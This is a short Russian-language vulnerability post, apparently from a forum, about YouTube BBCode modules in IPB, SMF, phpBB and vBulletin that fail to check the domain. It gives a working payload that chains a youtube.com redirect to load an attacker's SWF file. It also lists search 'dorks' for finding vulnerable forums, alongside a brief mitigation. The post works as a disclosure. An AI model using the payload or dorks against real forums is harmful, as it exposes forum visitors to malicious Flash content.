В составляющей части существующих модулей отсутствует проверка домена, что дает для атакующего возможность редиректа с помощью getURL. PHP: youtube.com/v/[param_here] & $txt['youtube'] = 'YouTube'; Пример: [youtube]../redirection?page=http://exploit.swf/[/youtube] Получение активного редиректа: PHP: http://www.youtube.com/v/../redirection?page=http://exploit.swf/ Присутствие модуля: IPB SMF phpBB vBulletin etc Воизбежание атаки рекомендуется использовать allowScriptAccess="never" / allownetworking="internal" / регулярное выражение. dork: BB Code : [yt] [/yt] /forum/ BB Code : [youtube] [/youtube] /forum/
